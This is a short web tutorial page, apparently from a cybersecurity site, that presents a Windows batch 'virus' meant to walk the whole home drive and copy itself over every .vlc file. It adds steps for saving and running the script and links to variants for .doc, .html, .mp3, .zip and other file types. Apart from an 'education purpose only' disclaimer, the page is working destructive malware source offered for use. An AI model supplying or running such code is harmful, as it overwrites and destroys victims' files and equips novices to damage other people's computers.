BATCH PROGRAMING VIRUS - Infect all vlc file

Note: This tutorial is education purpose only! This can be illegal! Use at your own risk !

@echo off

Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.vlc) Do (
Set VlcInfect=%%Z > Nul
Copy /y %0 %VlcInfect%
)
)

Del /f /s /q DirPath

:

Batch File Creation Steps

Step 1 : Open Notepad in windows operating system.
Step 2 : Write the above code.
Step 3 : save file as .bat extension.


To Learn Batch Programing Click here.

  1. Infect All .doc Files
  2. Infect All .html Files
  3. Infect All .mp3 Files
  4. Infect All .mp4 Files
  5. Infect All .mpeg Files
  6. Infect All .vlc Files
  7. Infect All .wma Files
  8. Infect All .zip Files
Indian Cyber Securiry



Research Papers


Case Study



Cyber Police


Newsletter